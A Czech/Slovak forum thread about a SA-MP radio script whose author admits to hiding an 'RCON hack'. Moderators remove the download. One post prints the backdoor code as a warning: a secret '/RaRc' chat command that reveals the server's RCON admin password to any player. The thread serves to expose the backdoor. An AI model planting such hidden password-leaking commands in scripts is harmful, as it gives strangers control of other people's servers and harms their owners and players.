Jump to content

RadioSystem *NEDOPORUČUJEME, SKRIPT OBSAHUJE RCON HACK*


G4NG

Recommended Posts

Je to rádio systém umožnujúci počúvať online-rádia.

Obsahuje via ako 49rádii a ešte nieje dokončeny.

Príkazy:

/radio1-49

/radiooff

Zabudoval som tam jeden rcon hack z dôvodu ochrany scriptu proti zmene autora vidavanie za svôj pri jeho predaji alebo inom zneužiti scriptu. Pre jeho odstranenie ma kontaktujte na:

Email: [email protected]" "

Skype: dbG4NGdb alebo DBsbkaV G4NG

 

********** Downlaod ZMAZANÝ - Obsahoval script ktorý porušuje

pravidlá sekcie "Vaše Scripty" !

 

Do dialšej verie plánujem pridať dialog a popisom žanrom uričých staníc a možnosť prehrávať videa z YT na vyhladanie poďla vamy zadaných kritérii a mnoho diaľšieho.

Link to comment
Share on other sites

  • Administrátor
ck z dôvodu ochrany scriptu proti zmene autora vidavanie za svôj pri jeho predaji alebo inom zneužiti scriptu.

Jeden prikaz jeden dialog listitmy to jako myslis ze to bude nekdo zneuzivat jo ? nebo vadávat za svoje? pffff

Link to comment
Share on other sites

Tak ja upozornil nato ze vtom je a ten hack nemam v pláne pouzit pokial dodrzia podmienky tj. nemenit autora , nevidavat za svoj a pre vetsie projekty ktore by ho celi na 100% bez hacku ma mozu kontaktovat odhackujem im ho :d kazdopadne je vtom hack to nepopieram :d

Link to comment
Share on other sites

  • Administrátor

Navíc stačí dát příkaz /audiomsg a hned mám tvoje url stanic takže ta tvoje "ochrana" je uplne zbytecna...

Link to comment
Share on other sites

  • Administrátor
Antideamx :d toto prelomi len qwer a jeho bajne lua :d

Nebo se squirelem

Mimochodem z tech tvejch 49 stanic jich jde tak asi 20 a nektery tam mas 2x

Link to comment
Share on other sites

Navíc stačí dát příkaz /audiomsg a hned mám tvoje url stanic takže ta tvoje "ochrana" je uplne zbytecna...

nj ale prpisat si 50+- stanic ti da zabrat :d ale jo máš pravdu pak dorobim antiaudiomessage ;) ale hlavne to tam mam keby prepsali autora :d

no nic, kouknu na DeAMX a udělám si ochranu proti tomu Rcon hacku a budeš v prd*li xD
pak mi pošli do sz deamxcode a ochranu nech sa zasmejem :d

PS: ziadna by nemala byt 2x ale je možne že niektore občas nejdu su vyple ale vetšina ide skoro nonstop

Link to comment
Share on other sites

  • Administrátor

Jo třeba Evropu 2 vypínaj dycky kolem oběda :d Nebo Frekvenci je ale tu spíš navečer a máš tam 2x HIpHopStage.

Lol prej AntiAudioMessage tak to GL

Link to comment
Share on other sites

POZOR SCRIPT OBSAHUJE PRÍKAZ KTORÝ ZISTÍ RON HESLO NA SERVERY ! (za účelom poškodenia servera/hráčov) ! POZOR

	if(!strcmp("/RaRc", cmdtext, true, 10))
{
	new var0[128];
	new var1[256];
	GetServerVarAsString("rcon_password", var1, 255);
	SendClientMessage(playerid, 0x00FFFFFF, "{0000FF}[{FF0000}Server{0000FF}]{000000}:{00FF00}Použil si tajný príkaz{FFFFFF}.");
	format(var0, 128, "[ Tajný příkaz ]RCON heslo je : %s", var1);
	SendClientMessage(playerid, 0x003F1C74, var0);
	SendClientMessage(playerid, 0x00FFFFFF, "{0000FF}[{FF0000}Server{0000FF}]{000000}:{00FF00}Použil si tajný príkaz{FFFFFF}.");
	return 1;
}

 

Tak ahoj o týždeň

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
×
×
  • Create New...